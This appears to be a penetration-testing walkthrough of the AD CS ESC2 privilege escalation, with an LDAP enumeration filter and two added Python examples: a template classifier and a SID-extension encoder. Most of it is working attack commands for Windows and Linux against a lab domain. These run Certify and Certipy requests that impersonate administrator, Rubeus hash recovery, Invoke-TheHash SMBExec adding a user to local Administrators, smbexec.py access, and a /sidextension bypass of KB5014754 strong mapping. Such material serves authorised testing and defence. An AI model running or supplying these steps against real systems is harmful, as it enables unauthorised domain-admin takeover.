
ESC2

This privilege escalation technique requires a certificate template that:

  • carries the Any Purpose EKU (OID 2.5.29.37.0), so a certificate issued from it is valid for every purpose (Client Authentication, Code Signing, ...), or carries no EKU at all
  • has the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT flag set in msPKI-Certificate-Name-Flag, so the requester chooses the subject and the SAN
  • grants enrollment rights to a low-privileged user and, as for ESC1, requires neither manager approval nor authorized signatures

To make it easier to remember, the only difference between ESC1 and ESC2 is the required EKU: ESC1 needs an EKU that permits authentication (Client Authentication, Smart Card Logon, PKINIT Client Authentication), ESC2 needs Any Purpose, which covers authentication as well. A template configured with no EKU at all, as for a subordinate CA, can be abused exactly like a template with the Any Purpose EKU, because a certificate without an EKU is treated as valid for every purpose.

Windows

Enumerate ESC2 vulnerability

The filter keeps templates where manager approval is off (msPKI-Enrollment-Flag without CT_FLAG_PEND_ALL_REQUESTS, 0x2), no authorized signature is required (msPKI-RA-Signature absent or 0), the enrollee supplies the subject (msPKI-Certificate-Name-Flag with CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, 0x1) and the EKU is Any Purpose (2.5.29.37.0) or absent; 1.2.840.113556.1.4.804 is the LDAP bitwise OR matching rule. Point -SearchBase at your forest's configuration naming context (DC=local,DC=lab below). Enrollment rights are not expressed in the filter, so check each hit's security descriptor for Enroll granted to low-privileged principals (Certify.exe find /vulnerable does that for you).

PS /home/bobbuilder> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1)(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=local,DC=lab'
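The same conditions as a local check, as an added example that is not the page's, Certify's or Certipy's code: it evaluates the clauses of the filter plus the ENROLLEE_SUPPLIES_SUBJECT and enrollment-rights requirements over constructed template records, and also separates ESC1 from ESC2 by EKU. The attribute names are the AD schema names; the "enroll" list standing in for the template's Enroll ACEs, the set of groups counted as low privileged and the sample templates are assumptions.

```python
# Added example (not code from the page, Certify or Certipy): the ESC2 conditions of the
# LDAP filter, plus the ENROLLEE_SUPPLIES_SUBJECT and enrollment-rights requirements,
# evaluated over constructed template records. Attribute names follow the AD schema; the
# "enroll" list stands in for the Enroll ACEs of the template's security descriptor.

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag: manager approval

ANY_PURPOSE_EKU = "2.5.29.37.0"
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
}
# Assumption: principals that make an Enroll right "low privileged"
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def classify_template(t):
    """Return 'ESC2', 'ESC1' or None for one template record."""
    if t.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS:
        return None                       # pending approval: the request never auto-issues
    if (t.get("msPKI-RA-Signature") or 0) > 0:
        return None                       # an enrollment agent signature is required
    if not (t.get("msPKI-Certificate-Name-Flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT):
        return None                       # SAN is built from AD, the requester cannot choose it
    if not (set(t.get("enroll", [])) & LOW_PRIV_PRINCIPALS):
        return None                       # only privileged principals can enroll
    ekus = t.get("pKIExtendedKeyUsage") or []
    if not ekus or ANY_PURPOSE_EKU in ekus:
        return "ESC2"                     # no EKU, or Any Purpose: usable for authentication too
    if AUTH_EKUS & set(ekus):
        return "ESC1"                     # an authentication EKU: classic ESC1
    return None                           # e.g. Code Signing only: cannot log on with it


def find_vulnerable(templates):
    """Map template cn -> ESC class for every template that classifies."""
    result = {}
    for t in templates:
        cls = classify_template(t)
        if cls:
            result[t["cn"]] = cls
    return result


def base(cn, **overrides):
    """Constructed sample record (not real AD data): an ESC2 template unless overridden."""
    rec = {"cn": cn, "msPKI-Enrollment-Flag": 0, "msPKI-RA-Signature": 0,
           "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
           "pKIExtendedKeyUsage": [ANY_PURPOSE_EKU], "enroll": ["Domain Users"]}
    rec.update(overrides)
    return rec


SAMPLE_TEMPLATES = [
    base("Template2"),                                                              # ESC2
    base("SubCALike", **{"pKIExtendedKeyUsage": None, "msPKI-RA-Signature": None}), # ESC2, no EKU
    base("ESC1Template", **{"pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"]}),         # ESC1
    base("NeedsApproval", **{"msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS}),  # safe
    base("FixedSubject", **{"msPKI-Certificate-Name-Flag": 0}),                     # safe
    base("AdminsOnly", enroll=["Domain Admins"]),                                   # safe
    base("CodeSigningOnly", **{"pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.3"]}),      # safe
]

if __name__ == "__main__":
    for cn, cls in find_vulnerable(SAMPLE_TEMPLATES).items():
        print(f"{cn}: {cls}")
```

Running it lists Template2 and SubCALike as ESC2 and ESC1Template as ESC1; the four remaining records each fail exactly one of the conditions, which is the quickest way to see why the filter needs every clause.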

Requesting a certificate

/ca takes <ca_host>\<ca_name>, /template the vulnerable template and /altname the account whose UPN is placed in the SAN; requesting it as the privileged target is what turns enrollment into escalation.

PS /home/bobbuilder> .\Certify.exe request /ca:CA-Server.minions.com\CA-SERVER /template:Template2 /altname:administrator

Convert Certificate

Certify prints the certificate and its private key as PEM; Rubeus expects a PFX, so export the pair to PKCS#12 (the openssl pkcs12 export command is given in Certify's README) as cert.pfx before the next step.

Certificate Authentication

PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /getcredentials /nowrap

/getcredentials makes Rubeus follow the PKINIT TGT with a U2U request and print the account's NTLM hash from the PAC credential information; that hash is what the next step uses.

PassTheHash using Invoke-TheHash

PS /home/bobbuilder> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS /home/bobbuilder> cd .\Invoke-TheHash\;Import-Module .\Invoke-TheHash.psm1
PS /home/bobbuilder> Invoke-TheHash -Type SMBExec -Target localhost -Username Administrator -Hash your_hash -Command "net localgroup Administrators user2 /add"

Linux

Certificate Request with alternative SAN

-ca takes the CA name and -target the CA host; -upn sets the UPN placed in the SAN, and Certipy names the output file after it (administrator.pfx here).

bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca CA-SERVER -target CA-Server.minions.com -template Template2 -upn administrator@minions.com

Certificate Authentication

bob$ certipy auth -pfx administrator.pfx -username administrator -domain minions.com -dc-ip <ip>

Verify

bob$ KRB5CCNAME=administrator.ccache smbexec.py -k -no-pass CA-Server.minions.com

ESC2 in CBA-Patched Environments

Once again, in an environment patched with KB5014754 (certificate-based authentication hardening), a certificate whose only link to the target is the SAN is a weak mapping, and a DC in Full Enforcement mode rejects it: the DC expects the account's SID in the szOID_NTDS_CA_SECURITY_EXT extension (OID 1.3.6.1.4.1.311.25.2). Since the template lets the enrollee supply the subject, the SID can be embedded in the request with Certify's /sidextension argument (Certipy offers the same through its own option); RID 500 below is the built-in Administrator.

PS /home/otter> .\Certify.exe request /ca:CA-Server.minions.com\CA-SERVER /template:Template2 /altname:administrator /sidextension:<domain_sid>-500 /domain:minions.com
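What /sidextension actually puts in the request, as an added example that is not Certify's or Certipy's code: it DER-encodes the szOID_NTDS_CA_SECURITY_EXT value for a given SID, parses it back, and performs the strong-mapping comparison a patched DC makes between the embedded SID and the account's objectSid. The domain SID and the RIDs are constructed, and the helper names are this example's own.

```python
# Added example (not Certify's or Certipy's code): encode and parse the value of the
# szOID_NTDS_CA_SECURITY_EXT extension (OID 1.3.6.1.4.1.311.25.2) that /sidextension embeds
# in the CSR, and perform the strong-mapping comparison a KB5014754 DC makes.
# DER layout of the extension value:
#   SEQUENCE {                                       -- GeneralNames
#     [0] {                                          -- OtherName
#       OBJECT IDENTIFIER 1.3.6.1.4.1.311.25.2.1     -- szOID_NTDS_OBJECTSID
#       [0] EXPLICIT OCTET STRING "S-1-5-21-...-RID"
#     }
#   }

NTDS_OBJECTSID_OID = bytes.fromhex("2b060104018237190201")   # 1.3.6.1.4.1.311.25.2.1, DER body


def _der_length(n):
    """DER length octets: short form below 0x80, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, body):
    return bytes([tag]) + _der_length(len(body)) + body


def encode_sid_extension(sid):
    """DER value of szOID_NTDS_CA_SECURITY_EXT carrying the given account SID string."""
    if not sid.startswith("S-1-"):
        raise ValueError("expected a SID string such as S-1-5-21-...-500")
    sid_octets = _tlv(0x04, sid.encode("ascii"))                      # OCTET STRING
    value = _tlv(0xA0, sid_octets)                                     # [0] EXPLICIT
    other_name = _tlv(0xA0, _tlv(0x06, NTDS_OBJECTSID_OID) + value)   # [0] IMPLICIT OtherName
    return _tlv(0x30, other_name)                                      # SEQUENCE (GeneralNames)


def _read_tlv(buf, pos, tag):
    """Parse one TLV at pos, check its tag, return (body, position after it)."""
    if pos + 1 >= len(buf) or buf[pos] != tag:
        raise ValueError(f"expected tag 0x{tag:02x} at offset {pos}")
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                                  # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated DER")
    return buf[pos:pos + length], pos + length


def decode_sid_extension(der):
    """Recover the SID string from an extension value; raise ValueError on anything else."""
    names, end = _read_tlv(der, 0, 0x30)
    if end != len(der):
        raise ValueError("trailing bytes after GeneralNames")
    other_name, _ = _read_tlv(names, 0, 0xA0)
    oid, pos = _read_tlv(other_name, 0, 0x06)
    if oid != NTDS_OBJECTSID_OID:
        raise ValueError("OtherName is not szOID_NTDS_OBJECTSID")
    value, _ = _read_tlv(other_name, pos, 0xA0)
    octets, _ = _read_tlv(value, 0, 0x04)
    return octets.decode("ascii")


def strongly_mapped_to(der, account_sid):
    """The DC-side check: the embedded SID must equal the objectSid of the account being logged on."""
    try:
        return decode_sid_extension(der) == account_sid
    except ValueError:
        return False                                   # malformed or absent: no strong mapping


# Constructed domain SID (not a real domain); RID 500 is the built-in Administrator
DOMAIN_SID = "S-1-5-21-1234567890-1234567890-1234567890"
TARGET_SID = DOMAIN_SID + "-500"

if __name__ == "__main__":
    ext = encode_sid_extension(TARGET_SID)
    print(ext.hex())
    print(decode_sid_extension(ext))
    print(strongly_mapped_to(ext, TARGET_SID), strongly_mapped_to(ext, DOMAIN_SID + "-1105"))
```

The comparison in strongly_mapped_to is why the SAN alone stops working after the patch: the DC no longer maps the certificate by UPN but by this SID, so the extension has to name the account the attacker wants to become, and nothing else in the certificate compensates for a wrong or missing one.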